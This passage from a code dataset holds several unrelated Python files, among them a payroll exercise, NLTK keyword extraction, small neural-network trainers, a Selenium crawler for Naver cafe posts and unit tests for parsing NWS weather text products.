print()\n print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n\n elif get_id == 45201:\n i = 1\n employee_wage = wage_lists(i,employeeWages)\n print()\n print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f')) \n\n\n elif get_id == 78951:\n i = 2\n employee_wage = wage_lists(i,employeeWages)\n print()\n print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n \n elif get_id == 87775:\n i = 3\n employee_wage = wage_lists(i,employeeWages)\n print()\n print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n \n elif get_id == 84512:\n i = 4\n employee_wage = wage_lists(i,employeeWages)\n print()\n print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n \n elif get_id == 13028:\n i = 5\n employee_wage = wage_lists(i,employeeWages)\n print()\n print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n \n elif get_id == 75804:\n i = 6\n employee_wage = wage_lists(i,employeeWages)\n print()\n print(\"Employee ID:\",get_id,'\\t\\t',\"Employee's Gross Wages:\",\"$\"+format(float(employee_wage),',.2f'))\n\n \n else:\n print()\n print(\"You entered an invalid Employee ID number\")\n \n \n#Function to hold each list \n#-------------------------------------------------\n \n\ndef lists():\n\n employeeID = [56588,45201,78951,87775,84512,13028,75804]\n\n employeePayRate = [13.60,13.50,13.40,13.30,13.20,13.10,13.00]\n\n employeeHours = [40,41,42,43,44,45,46]\n\n employeeWages = [544.00,553.50,562.80,571.90,580.80,589.50,598.00]\n\n return employeeWages,employeeHours,employeePayRate,employeeID\n\n\n#Function to pull only the wages from the wage list in the list() function\n#-------------------------------------------------------------------------\n\ndef wage_lists(i,employeeWages):\n\n payAmount = employeeWages\n\n return payAmount[i]\n\n\nmain()\n","sub_path":"Program 13/Floam_Prog 13_Payroll Program.py","file_name":"Floam_Prog 13_Payroll Program.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"353692353","text":"from nltk import pos_tag\nimport nltk\nfrom nltk import RegexpParser\nimport collections\nfrom nltk.stem.porter import *\n\nstemmer = PorterStemmer()\n\ndef clean_text(text):\n text = text.replace('next page', '')\n text = text.replace('(', '')\n text = text.replace(')', '')\n text = text.replace('“', '')\n text = text.replace('”', '')\n text = text.replace('/n', ' ')\n text = text.replace('.', ' ')\n text = text.replace(',', ' ')\n text = text.lower()\n return text\n\ndef get_noun_counter(text) -> collections.Counter: \n\n text = text.split()\n tokens_tag = pos_tag(text)\n patterns= \"\"\"mychunk:{<JJ.?>*<NN.?.?>*}\"\"\"\n chunker = RegexpParser(patterns)\n output = chunker.parse(tokens_tag)\n\n noun_list = []\n compound_noun_list = []\n for n in output:\n if isinstance(n, nltk.tree.Tree):\n n = str(n)\n part_of_speech = [el.split('/')[1]for el in n.split()[1:]]\n if any([el.find('NN')>-1 for el in part_of_speech]):\n noun = [\n stemmer.stem(el.split('/')[0])\n if el.split('/')[1] == 'NNS' or el.split('/')[1] == 'NNPS' \n else el.split('/')[0] \n for el in n.split()[1:]\n ]\n compound_noun_list.append(''.join([ f'{n} ' for n in noun ])[:-1])\n noun_list.extend(noun)\n\n noun_list = [ noun for noun in noun_list if len(noun) > 1]\n\n return collections.Counter(noun_list), compound_noun_list\n\ndef is_target_noun(compound_noun, common_word):\n\n return(\n any([ len(noun) <= len(common_word) + 2 and noun.find(common_word)>-1 for noun in compound_noun.split() ])\n or\n any([ len(noun) <= len(common_word) + 2 and noun.find(common_word)>-1 for noun in compound_noun.split('-') ])\n )\n\ndef _get_keyword_list(common_word_list, compound_noun_list):\n\n compound_word_dict = {}\n for common_word in common_word_list:\n compound_word_dict[common_word] = []\n for compound_noun in compound_noun_list:\n if is_target_noun(compound_noun, common_word):\n compound_word_dict[common_word].append(compound_noun)\n return compound_word_dict\n\ndef print_keyword_list(keyword_list):\n\n for common_word, compound_noun_list in keyword_list.items():\n print(common_word)\n for compound_noun in compound_noun_list:\n print(compound_noun)\n print()\n\ndef get_keyword_list(raw_text):\n text = clean_text(raw_text)\n noun_counter, compound_noun_list = get_noun_counter(text)\n common_word_list = [\n common_word[0] for common_word in noun_counter.most_common(100)\n ]\n keyword_list = _get_keyword_list(common_word_list, compound_noun_list)\n return keyword_list\n\ndef main():\n\n with open('each_public_comment/COM 70 #2021.txt') as r:\n keyword_list = get_keyword_list(r.read())\n print_keyword_list(keyword_list)\n \n\nif __name__ == '__main__':\n main()\n\n\n ","sub_path":"public_comment_analyzer/public_comment_analyzer/get_keyword_list.py","file_name":"get_keyword_list.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"578627874","text":"nums = [1,2,3]\nn2= [9,9]\nn3= [8,9,9,9]\n\n\ns =[str(n) for n in n2]\nprint(list(str(int(''.join(s))+1)))\n\ndef plusOne(nums):\n final = []\n carry = 0\n total = 0\n \n for i in range(len(nums)-1,-1,-1):\n print(i)\n total = nums[i] + carry\n if i == len(nums)-1:\n total +=1\n \n if total == 10:\n carry = 1\n final.append(0)\n else:\n carry =0\n final.append(total)\n \n if carry != 0:\n final.append(carry)\n \n print(final[::-1])\n \nprint(plusOne(n3))","sub_path":"leetcode/arrays_and_string/practice/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"349349433","text":"#!/usr/bin/python\nfrom PIL import Image\nfrom PIL import ImageOps\nimport xlwt,sys\n\nx = 150\ny = 150\n\nim = Image.open(\"C:/Users/DELL/homework/py.jpg\") # load image\nim.resize((x,y)).save('resize.jpg')\n\nim = Image.open(\"C:/Users/DELL/homework/py.jpg\") # saving image for ref\noutput = ImageOps.grayscale(im) # convert to grayscale\noutput.save('resize.jpg')\nim = Image.open(\"C:/Users/DELL/homework/py.jpg\")\n\nf = open(\"image.txt\", \"w\") # open text file\n\nfor pixelx in range(0,x-1):\n f.write('\\n')\n for pixely in range(0,y-1):\n color = im.getpixel((pixely,pixelx))\n if color <= 255 and color >= 253:ch = \" \"\n elif color <= 253 and color >= 250:ch = \".\"\n elif color <= 250 and color >= 230:ch = \",\"\n elif color <= 230 and color >= 210:ch = '\"'\n elif color <= 210 and color >= 190:ch = '^'\n elif color <= 190 and color >= 170:ch = \"%\"\n elif color <= 170 and color >= 150:ch = \"&\"\n elif color <= 150 and color >= 130:ch = \"a\"\n elif color <= 130 and color >= 110:ch = \"o\"\n elif color <= 110 and color >= 90:ch = \"0\"\n elif color <= 90 and color >= 70:ch = 'L'\n elif color <= 70 and color >= 50:ch = 'y'\n elif color <= 50 and color >= 30:ch = \"Y\"\n elif color <= 30 and color >= 10:ch = \"H\"\n elif color < 10 and color >= 0:ch = \"#\"\n else:ch = \" \"\n f.write(ch)\n","sub_path":"lab_4.py","file_name":"lab_4.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"346611281","text":"#!/usr/bin/env python\n \n##\n## See COPYING file distributed along with the ncanda-data-integration package\n## for the copyright and license terms\n##\n\nimport pandas\n\nimport Rwrapper\n\n#\n# Variables from surveys needed for CTQ\n#\n\n# LimeSurvey field names\nlime_fields = [ \"ctq_set1 [ctq1]\", \"ctq_set1 [ctq2]\", \"ctq_set1 [ctq3]\", \"ctq_set1 [ctq4]\", \"ctq_set1 [ctq5]\", \"ctq_set1 [ctq6]\", \"ctq_set1 [ctq7]\", \"ctq_set2 [ctq8]\", \"ctq_set2 [ctq9]\", \"ctq_set2 [ct10]\", \"ctq_set2 [ct11]\",\n \"ctq_set2 [ct12]\", \"ctq_set2 [ct13]\", \"ctq_set2 [ct14]\", \"ctq_set3 [ctq15]\", \"ctq_set3 [ctq16]\", \"ctq_set3 [ctq17]\", \"ctq_set3 [ctq18]\", \"ctq_set3 [ctq19]\", \"ctq_set3 [ctq20]\", \"ctq_set3 [ctq21]\",\n \"ctq_set4 [ctq22]\", \"ctq_set4 [ctq23]\", \"ctq_set4 [ctq24]\", \"ctq_set4 [ctq25]\", \"ctq_set4 [ctq26]\", \"ctq_set4 [ctq27]\", \"ctq_set4 [ctq28]\" ]\n\n# Dictionary to recover LimeSurvey field names from REDCap names\nrc2lime = dict()\nfor field in lime_fields:\n rc2lime[Rwrapper.label_to_sri( 'youthreport2', field )] = field\n\n# REDCap fields names\ninput_fields = { 'mrireport' : [ 'youth_report_2_complete', 'youthreport2_missing' ] + rc2lime.keys() }\n\n#\n# This determines the name of the form in REDCap where the results are posted.\n#\noutput_form = 'clinical'\n\n#\n# CTQ field names mapping from R to REDCap\n#\nR2rc = { 'Emotional Abuse Scale Total Score' : 'ctq_ea', \n 'Physical Abuse Scale Total Score' : 'ctq_pa', \n 'Sexual Abuse Scale Total Score' : 'ctq_sa', \n 'Emotional Neglect Scale Total Score' : 'ctq_en', \n 'Physical Neglect Scale Total Score' : 'ctq_pn', \n 'Minimization/Denial Scale Total Score' : 'ctq_minds' }\n\n#\n# Scoring function - take requested data (as requested by \"input_fields\") for each (subject,event), and demographics (date of birth, gender) for each subject.\n#\ndef compute_scores( data, demographics ):\n # Get rid of all records that don't have YR2\n data.dropna( axis=1, subset=['youth_report_2_complete'] )\n data = data[ data['youth_report_2_complete'] > 0 ]\n data = data[ ~(data['youthreport2_missing'] > 0) ]\n\n # If no records to score, return empty DF\n if len( data ) == 0:\n return pandas.DataFrame()\n\n # Replace all column labels with the original LimeSurvey names\n data.columns = Rwrapper.map_labels( data.columns, rc2lime )\n\n # Call the scoring function for all table rows\n scores = data.apply( Rwrapper.runscript, axis=1, Rscript='ctq/CTQ.R', scores_key='CTQ.ary' )\n\n # Replace all score columns with REDCap field names\n scores.columns = Rwrapper.map_labels( scores.columns, R2rc )\n\n # Simply copy completion status from the input surveys\n scores['ctq_complete'] = data['youth_report_2_complete'].map( int )\n\n # Make a proper multi-index for the scores table\n scores.index = pandas.MultiIndex.from_tuples(scores.index)\n scores.index.names = ['study_id', 'redcap_event_name']\n\n # Return the computed scores - this is what will be imported back into REDCap\n outfield_list = [ 'ctq_complete' ] + R2rc.values()\n return scores[ outfield_list ]\n\n","sub_path":"scripts/redcap/scoring/ctq/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"111825958","text":"import numpy as np\nfrom tensorflow import keras\n\nxdata = \"features12.npy\"\nydata = \"labels12.npy\"\nnumLoops = 250\n\nX = np.load(xdata)\ny = np.load(ydata)\nX = X / 255.0\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(50, 50)),\n\n keras.layers.Dense(128, activation=\"softplus\"),\n keras.layers.Dense(64, activation=\"softplus\"),\n\n keras.layers.Dense(10, activation=\"softmax\"),\n])\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(X, y, epochs=numLoops)\n","sub_path":"ControlModel.py","file_name":"ControlModel.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"449167180","text":"import os, sys\r\nsys.path.append(os.pardir)\r\nfrom common.MultiLayerNet import MultiLayerNet\r\nfrom dataset.mnist import load_mnist\r\nfrom common.optimizer import SGD\r\nimport numpy as np\r\n\r\n\r\n\r\n(x_train, t_train), (x_test, t_test) = load_mnist(normalize= True, one_hot_label = True)\r\noptimizer = SGD()\r\n\r\nnetwork = MultiLayerNet(784, [100, 100, 100, 100], 10)\r\n\r\n\r\niter_nums = 10000\r\ntrain_size = x_train.shape[0]\r\nbatch_size = 100\r\n\r\ntrain_acc_list = []\r\ntest_acc_list = []\r\n\r\niter_per_epoch = max(train_size / batch_size, 1)\r\n\r\nfor i in range(iter_nums):\r\n batch_mask = np.random.choice(train_size, batch_size)\r\n x_batch = x_train[batch_mask]\r\n t_batch = t_train[batch_mask]\r\n\r\n\r\n grads = network.gradient(x_batch, t_batch)\r\n optimizer.update(network.params, grads)\r\n\r\n if i % iter_per_epoch == 0:\r\n #train_acc = network.accuracy(x_train, t_train)\r\n #test_acc = network.accuracy(x_test, t_test)\r\n loss = network.loss(x_train, t_train)\r\n #train_acc_list.append(train_acc)\r\n #test_acc_list.append(test_acc)\r\n print(loss)\r\n\r\n","sub_path":"fully_connect/TwoLayerNet/train_neuralnetwork.py","file_name":"train_neuralnetwork.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"196667411","text":"import bisect\n\n\ndef bisect_tutorial():\n fruits = [\"apple\", \"banana\", \"banana\", \"banana\", \"orange\", \"pineapple\"]\n print(bisect.bisect(fruits, \"banana\"))\n print(bisect.bisect_left(fruits, \"banana\"))\n occurrences = bisect.bisect(fruits, \"banana\") - bisect.bisect_left(fruits, \"banana\")\n print(occurrences) # Number of occurrences of the word banana\n\n bisect.insort_left(fruits, \"kiwi\")\n print(fruits)\n\n\ndef binary_iterative(elements, search_item):\n \"\"\"Return the index of the search_item element.\"\"\"\n\n left, right = 0, len(elements) - 1\n\n while left <= right:\n\n middle_idx = (left + right) // 2\n middle_element = elements[middle_idx]\n\n if middle_element == search_item:\n return middle_idx\n if middle_element < search_item:\n left = middle_idx + 1\n elif middle_element > search_item:\n right = middle_idx - 1\n\n return None\n\n\nif __name__ == '__main__':\n elements = [3, 4, 5, 5, 9]\n a = binary_iterative(elements, 5)\n print(a)\n","sub_path":"PythonInterview/binarySearch.py","file_name":"binarySearch.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"371166860","text":"import numpy as np\nimport olim\nimport pyvista as pv\n\n# normalized = lambda p: p/np.linalg.norm(p)\n# angle = lambda i, i0, i1: normalized(points[i0] - points[i])@normalized(points[i1] - points[i])\n\ndef print_stencil_builder_state(bld):\n print(f'lines = {bld.current_lines()}')\n print(f'edges = {bld.stencil().tris}')\n print(f'tetras = {bld.current_tetras()}')\n \ndef get_lines_tris_and_tetras(obj):\n if isinstance(obj, olim.Stencil):\n lines = np.array(obj.lines)\n tris = np.array([(tri.i0, tri.i1) for tri in obj.tris])\n tetras = np.array([(tetra.i0, tetra.i1, tetra.i2) for tetra in obj.tetras])\n else:\n assert isinstance(obj, olim.StencilBuilder)\n lines = np.array(list(obj.current_lines()))\n tris = np.array([(tri.i0, tri.i1) for tri in obj.stencil().tris])\n tetras = np.array([(tetra.i0, tetra.i1, tetra.i2) for tetra in obj.current_tetras()])\n return lines, tris, tetras\n\ndef get_angles(bld):\n return [\n ((tri.i0, tri.i1), angle(i, tri.i0, tri.i1))\n for tri in bld.stencil().tris\n ]\n\ndef get_most_obtuse_tri_update(bld):\n return get_angles(bld)[0][0]\n\ndef print_angles(bld, i):\n print(f'angles for stencil at i = {i}')\n for tri in bld.stencil().tris:\n print(f'- i0 = {tri.i0}, i1 = {tri.i1}, angle = {angle(i, tri.i0, tri.i1)}')\n\ndef plot_update(obj, on_boundary_func, points, i, base_radius=0.01, window_size=(512, 512), background_plotter=False):\n normalized = lambda p: p/np.linalg.norm(p)\n angle = lambda i, i0, i1: normalized(points[i0] - points[i])@normalized(points[i1] - points[i])\n lines, tris, tetras = get_lines_tris_and_tetras(obj)\n if background_plotter:\n plt = pv.BackgroundPlotter()\n else:\n plt = pv.Plotter(window_size=window_size)\n p_i = points[i]\n plt.add_mesh(pv.Sphere(base_radius, p_i), color='blue')\n for i0 in lines:\n p_i0 = points[i0]\n if on_boundary_func(i) and on_boundary_func(i0):\n color = 'orange'\n else:\n color = 'white'\n plt.add_mesh(pv.Sphere(0.666*base_radius, p_i0), color=color)\n direction = p_i0 - p_i\n height = np.linalg.norm(direction)\n direction /= height\n plt.add_mesh(pv.Cylinder((p_i + p_i0)/2, direction, base_radius/5, height), color=color)\n for i0, i1 in tris:\n noncausal = angle(i, i0, i1) < 0\n p_i0, p_i1 = points[i0], points[i1]\n direction = p_i1 - p_i0\n height = np.linalg.norm(direction)\n direction /= height\n if noncausal:\n color = 'red'\n elif on_boundary_func(i) and on_boundary_func(i0) and on_boundary_func(i1):\n color = 'orange'\n else:\n color = 'white'\n plt.add_mesh(pv.Cylinder((p_i0 + p_i1)/2, direction, base_radius/5, height), color=color)\n plt.add_mesh(\n pv.PolyData(\n points,\n np.concatenate(\n [\n 3*np.ones((tetras.shape[0], 1), tetras.dtype),\n tetras\n ],\n axis=1\n ),\n ),\n color='purple',\n opacity=0.5\n )\n if not background_plotter:\n plt.show()\n\ndef get_new_point_to_insert(points, i, i0, i1):\n p0 = points[i0] - points[i]\n p1 = points[i1] - points[i]\n n = normalized((p0 + p1)/2)\n return points[i] + h*n\n\ndef find_containing_tetra(points, tetra, pnew):\n def in_tetra(T):\n q = pnew - points[T][0]\n lam = np.linalg.solve((points[T][1:] - points[T][0]).T, q)\n return np.all(lam > 0) and lam.sum() < 1\n tets = np.where(np.apply_along_axis(in_tetra, 1, tetra))[0]\n if len(tets) == 0:\n raise Exception(\"didn't find any containing tetrahedra!\")\n elif len(tets) > 1:\n raise Exception(\"found multiple containing tetrahedra?!\")\n else:\n return tets[0]\n\ndef insert_new_point(points, tetra, pnew):\n tet_ind = find_containing_tetra(points, tetra, pnew)\n j = points.shape[0]\n j0, j1, j2, j3 = tetra[tet_ind]\n new_tetra = np.array([\n [j, j0, j1, j2],\n [j3, j, j0, j1],\n [j2, j3, j, j0],\n [j1, j2, j3, j]\n ], dtype=tetra.dtype)\n points = np.concatenate([points, [pnew]], axis=0)\n tetra = np.concatenate([\n np.delete(tetra, tet_ind, axis=0),\n new_tetra\n ], axis=0)\n return points, tetra","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"153953452","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.11.4\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# +\nfrom selenium import webdriver\n\n\noptions = webdriver.ChromeOptions()\n# options.add_argument('headless') # headless 모드 사용하지 않을 경우 주석처리\noptions.add_argument('window-size=1920x1080')\noptions.add_argument(\"disable-gpu\")\ndriver = webdriver.Chrome('chromedriver', options=options)\ndriver.implicitly_wait(5)\n\nprint(\"Login Start\")\ndriver.get('https://nid.naver.com/nidlogin.login')\ntag_id = driver.find_element_by_name('id')\ntag_pw = driver.find_element_by_name('pw')\ntag_id.clear()\ndriver.implicitly_wait(1)\n\ndriver.execute_script(\"document.getElementsByName('id')[0].value='아이디'\")\ndriver.implicitly_wait(1)\n\ndriver.execute_script(\"document.getElementsByName('pw')[0].value='비밀번호'\")\ndriver.implicitly_wait(1)\n\n# 로그인 버튼 클릭\ndriver.find_element_by_xpath('//*[@id=\"frmNIDLogin\"]/fieldset/input').click()\ndriver.implicitly_wait(1)\nprint(\"Login Completion\")\n\n# 카페 글 링크 가져오기\ndef crawling_new_url(cafe_url):\n print(\"URL Crawling Start\")\n article_url = []\n append = article_url.append\n for url in cafe_url:\n print(url)\n driver.get(url)\n driver.implicitly_wait(3)\n driver.switch_to.frame(\"cafe_main\")\n while 1:\n check = 1\n page_bar = driver.find_elements_by_css_selector('.prev-next > a')\n page = []\n for e in page_bar:\n if e.text != '이전':\n page.append(e.text)\n\n print(\"page: \", page)\n for i in page:\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n article_list = soup.find_all('div', class_='article-board m-tcol-c')[1].find_all('a', class_='article')\n\n for j in range(len(article_list)):\n element = article_list[j].get('href')\n append('https://cafe.naver.com' + element)\n\n try:\n # 다음 페이지로\n if check == len(page):\n check = 'stop'\n break\n elif (int(i) % 10) == 0:\n driver.find_element_by_link_text('다음').click()\n driver.implicitly_wait(3)\n else:\n driver.find_element_by_link_text(str(int(i) + 1)).click()\n check += 1\n driver.implicitly_wait(3)\n except Exception as error: # 로딩 실패시 재시도\n print(error)\n pass\n if check == 'stop':\n break\n print('--> ', len(article_url), article_url)\n print(\"URL Crawling Completion\")\n return article_url\n\n","sub_path":".ipynb_checkpoints/Crawler-checkpoint.py","file_name":"Crawler-checkpoint.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"194329145","text":"\"\"\"Testing!\"\"\"\nimport unittest\nimport datetime\nimport os\n\nimport pytz\n\nfrom pyiem.nws import product, ugc\nfrom pyiem.nws.product import WMO_RE\nfrom pyiem.nws.product import TextProductException\nfrom pyiem.nws.products import parser as productparser\n\n\ndef get_file(name):\n ''' Helper function to get the text file contents '''\n basedir = os.path.dirname(__file__)\n fn = \"%s/../../../data/product_examples/%s\" % (basedir, name)\n return open(fn, 'rb').read().decode('utf-8')\n\n\ndef utc(year, month, day, hour=0, minute=0):\n \"\"\"UTC Timestamp generator\"\"\"\n return datetime.datetime(year, month, day, hour,\n minute).replace(tzinfo=pytz.timezone(\"UTC\"))\n\n\nclass TestProduct(unittest.TestCase):\n \"\"\"Test Products\"\"\"\n maxDiff = None\n\n def test_170411_fakemnd(self):\n \"\"\"This RTP has a quasi-faked timestamp in the header causing error\"\"\"\n tp = productparser(get_file('RTPSGX.txt'))\n res = utc(2017, 4, 10, 23, 30)\n self.assertEqual(tp.valid, res)\n\n def test_151024_cae(self):\n \"\"\"Make sure this CAE product works and does not throw an UGC error\"\"\"\n tp = productparser(get_file('CAEIA.txt'))\n self.assertEquals(tp.afos, 'CAEIA')\n\n def test_resent(self):\n \"\"\" Make sure we can tell a ...RESENT product \"\"\"\n tp = productparser(get_file('MWWBRO.txt'))\n self.assertTrue(tp.is_resent())\n\n def test_wmoheader(self):\n \"\"\"\" Make sure we can handle some header variations \"\"\"\n ar = [\"FTUS43 KOAX 102320 \",\n \"FTUS43 KOAX 102320 COR \",\n \"FTUS43 KOAX 102320 COR \",\n \"FTUS43 KOAX 102320\",\n ]\n for item in ar:\n self.assertTrue(WMO_RE.match(item) is not None)\n\n def test_rfd(self):\n \"\"\" Parse a RFD \"\"\"\n tp = productparser(get_file('RFDOAX.txt'))\n self.assertEqual(tp.get_channels()[0], 'RFDOAX')\n j = tp.get_jabbers('http://localhost')\n self.assertEqual(j[0][0], (\n 'OAX issues Grassland Fire Danger '\n '(RFD) at Jan 19, 4:10 AM CST ...MODERATE FIRE DANGER TODAY... '\n 'http://localhost?pid=201501191010-KOAX-FNUS63-RFDOAX'))\n\n def test_hwo(self):\n \"\"\" Parse a HWO \"\"\"\n tp = productparser(get_file('HWO.txt'))\n self.assertEqual(tp.get_channels()[0], 'HWOLOT')\n j = tp.get_jabbers('http://localhost')\n self.assertEqual(j[0][0], (\n 'LOT issues Hazardous Weather Outlook '\n '(HWO) at Jan 8, 3:23 PM CST '\n 'http://localhost?pid=201301082123-KLOT-FLUS43-HWOLOT'))\n\n def test_140710_wmoheader_fail(self):\n \"\"\" Make sure COR in WMO header does not trip us up\"\"\"\n tp = product.TextProduct(get_file('MANANN.txt'))\n self.assertEqual(tp.afos, 'MANANN')\n self.assertTrue(tp.is_correction())\n\n def test_now_jabber(self):\n ''' See if we can process a NOW and get the jabber result '''\n tp = product.TextProduct(get_file('NOWDMX.txt'))\n j = tp.get_jabbers(\"http://localhost\")\n self.assertEqual(j[0][0],\n (\"DMX issues Short-term Forecast (NOW) \"\n \"at Mar 4, 8:42 AM CST \"\n \"http://localhost?\"\n \"pid=201003041442-KDMX-FPUS73-NOWDMX\"))\n\n def test_nomnd_with_timestamp(self):\n ''' Make sure we process timestamps correctly when there is no MND'''\n utcnow = datetime.datetime(2013, 12, 31, 18, 0)\n utcnow = utcnow.replace(tzinfo=pytz.timezone(\"UTC\"))\n tp = product.TextProduct(get_file('MAVWC0.txt'), utcnow=utcnow)\n ts = datetime.datetime(2014, 1, 1, 0, 0)\n ts = ts.replace(tzinfo=pytz.timezone(\"UTC\"))\n self.assertEqual(tp.valid, ts)\n\n def test_empty(self):\n \"\"\" see what happens when we send a blank string \"\"\"\n self.assertRaises(TextProductException, product.TextProduct, \"\")\n\n def test_invalid_mnd_date(self):\n \"\"\" Check parsing of timestamp \"\"\"\n answer = datetime.datetime(2013, 1, 3, 6, 16)\n answer = answer.replace(tzinfo=pytz.timezone(\"UTC\"))\n tp = product.TextProduct(get_file('CLI/CLINYC.txt'))\n self.assertEqual(tp.valid, answer)\n\n def test_ugc_error130214(self):\n \"\"\" Check parsing of SPSJAX \"\"\"\n tp = product.TextProduct(get_file('SPSJAX.txt'))\n self.assertEqual(tp.segments[0].ugcs, [ugc.UGC(\"FL\", \"Z\", 23),\n ugc.UGC(\"FL\", \"Z\", 25),\n ugc.UGC(\"FL\", \"Z\", 30),\n ugc.UGC(\"FL\", \"Z\", 31),\n ugc.UGC(\"FL\", \"Z\", 32)\n ])\n\n def test_no_ugc(self):\n \"\"\" Product that does not have UGC encoding \"\"\"\n data = get_file('CCFMOB.txt')\n tp = product.TextProduct(data)\n self.assertEqual(len(tp.segments[0].ugcs), 0)\n\n def test_ugc_invalid_coding(self):\n \"\"\" UGC code regression \"\"\"\n data = get_file('FLW_badugc.txt')\n tp = product.TextProduct(data)\n # self.assertRaises(ugc.UGCParseException, product.TextProduct, data )\n self.assertEqual(len(tp.segments[0].ugcs), 0)\n\n def test_000000_ugctime(self):\n \"\"\" When there is 000000 as UGC expiration time \"\"\"\n tp = product.TextProduct(get_file('RECFGZ.txt'))\n self.assertEqual(tp.segments[0].ugcexpire, None)\n\n def test_stray_space_in_ugc(self):\n \"\"\" When there are stray spaces in the UGC! \"\"\"\n tp = product.TextProduct(get_file('RVDCTP.txt'))\n self.assertEqual(len(tp.segments[0].ugcs), 28)\n\n def test_ugc_in_hwo(self):\n \"\"\" Parse UGC codes in a HWO \"\"\"\n tp = product.TextProduct(get_file('HWO.txt'))\n self.assertEqual(tp.segments[1].ugcs, [ugc.UGC(\"LM\", \"Z\", 740),\n ugc.UGC(\"LM\", \"Z\", 741),\n ugc.UGC(\"LM\", \"Z\", 742),\n ugc.UGC(\"LM\", \"Z\", 743),\n ugc.UGC(\"LM\", \"Z\", 744),\n ugc.UGC(\"LM\", \"Z\", 745)\n ])\n\n def test_afos(self):\n \"\"\" check AFOS PIL Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n self.assertEqual(tp.afos, 'AFDBOX')\n\n def test_source(self):\n \"\"\" check tp.source Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n self.assertEqual(tp.source, 'KBOX')\n\n def test_wmo(self):\n \"\"\" check tp.wmo Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n self.assertEqual(tp.wmo, 'FXUS61')\n\n def test_notml(self):\n \"\"\" check TOR without TIME...MOT...LOC \"\"\"\n tp = product.TextProduct(get_file('TOR.txt'))\n self.assertEqual(tp.segments[0].tml_dir, None)\n\n def test_signature(self):\n \"\"\" check svs_search \"\"\"\n tp = product.TextProduct(get_file('TOR.txt'))\n self.assertEqual(tp.get_signature(), \"CBD\")\n\n def test_spanishMWW(self):\n \"\"\" check spanish MWW does not break things \"\"\"\n tp = product.TextProduct(get_file('MWWspanish.txt'))\n self.assertEqual(tp.z, None)\n\n def test_svs_search(self):\n \"\"\" check svs_search \"\"\"\n tp = product.TextProduct(get_file('TOR.txt'))\n self.assertEqual(tp.segments[0].svs_search(),\n (\"* AT 1150 AM CDT...THE NATIONAL WEATHER SERVICE \"\n \"HAS ISSUED A TORNADO WARNING FOR DESTRUCTIVE \"\n \"WINDS OVER 110 MPH IN THE EYE WALL AND INNER RAIN \"\n \"BANDS OF HURRICANE KATRINA. THESE WINDS WILL \"\n \"OVERSPREAD MARION...FORREST AND LAMAR COUNTIES \"\n \"DURING THE WARNING PERIOD.\"))\n\n def test_product_id(self):\n \"\"\" check valid Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n self.assertEqual(tp.get_product_id(),\n \"201211270001-KBOX-FXUS61-AFDBOX\")\n\n def test_valid(self):\n \"\"\" check valid Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n ts = datetime.datetime(2012, 11, 27, 0, 1)\n ts = ts.replace(tzinfo=pytz.timezone(\"UTC\"))\n self.assertEqual(tp.valid, ts)\n\n def test_FFA(self):\n \"\"\" check FFA Parsing \"\"\"\n tp = product.TextProduct(get_file('FFA.txt'))\n self.assertEqual(tp.segments[0].get_hvtec_nwsli(), \"NWYI3\")\n\n def test_valid_nomnd(self):\n \"\"\" check valid (no Mass News) Parsing \"\"\"\n utcnow = datetime.datetime(2012, 11, 27, 0, 0)\n utcnow = utcnow.replace(tzinfo=pytz.timezone(\"UTC\"))\n tp = product.TextProduct(get_file('AFD_noMND.txt'),\n utcnow=utcnow)\n ts = datetime.datetime(2012, 11, 27, 0, 1)\n ts = ts.replace(tzinfo=pytz.timezone(\"UTC\"))\n self.assertEqual(tp.valid, ts)\n\n def test_headlines(self):\n \"\"\" check 